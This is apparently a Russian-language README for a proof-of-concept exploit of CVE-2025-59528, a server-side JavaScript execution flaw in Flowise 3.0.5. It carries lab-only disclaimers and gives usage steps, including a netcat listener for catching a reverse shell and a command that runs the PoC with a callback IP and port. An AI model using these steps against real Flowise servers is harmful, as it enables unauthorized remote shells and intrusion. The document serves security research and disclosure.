
The poc of CVE-2025-59528
Концепция доказательства (Proof of Concept) для исследования CVE-2025-59528 в изолированной лабораторной среде.
[!WARNING] ПРЕДУПРЕЖДЕНИЕ
Данный проект предназначен строго для образовательных целей, исследований в области безопасности и тестирования систем, которыми вы владеете или на тестирование которых у вас есть явное разрешение.
Не используйте этот PoC против сторонних серверов, публичных сервисов или инфраструктуры без разрешения владельца.
Автор не несёт ответственности за любой ущерб, потерю данных, нарушение работы сервисов или юридические последствия, возникшие в результате неправомерного использования данного проекта.
Этот PoC демонстрирует потенциальное воздействие уязвимости CVE-2025-59528, связанной с обработкой управляемого пользователем параметра mcpServerConfig в Flowise.
При определённых условиях уязвимость может позволить атакующему выполнить произвольный JavaScript-код в контексте серверной стороны.
Всегда проверяйте точную версию целевой установки перед тестированием.
requestsУстановите зависимость Python:
pip install requests
Запустите netcat для получения shell:
nc -lvnp <YOUR_PORT>
Запустите PoC командой:
python3 poc.py \
-t http://TARGET:PORT \
-o api_key \
-i CALLBACK_IP \
-p CALLBACK_PORT
| Аргумент | Описание |
|---|---|
-t, --target | URL тестового экземпляра Flowise |
-o, --api_key | API-ключ |
-i, --ip | IP-адрес тестовой машины |
-p, --port | Порт, используемый тестовым окружением |
Тестирование должно выполняться внутри изолированной виртуальной или лабораторной сети.
┌──────────────────┐
│ PoC Machine │
│ │
│ Python PoC │
└────────┬─────────┘
│
│ Isolated Network
│
┌────────▼─────────┐
│ Flowise 3.0.5 │
│ Test Instance │
└──────────────────┘
Не открывайте намеренно уязвимый экземпляр Flowise напрямую в публичном интернете.
Если вы используете затронутую версию Flowise:
Используя этот проект, вы подтверждаете, что несёте единоличную ответственность за соблюдение всех применимых законов и нормативных требований.
Используйте этот PoC только против систем, которыми вы владеете, или систем, на которых вам явно разрешено проводить тестирование безопасности.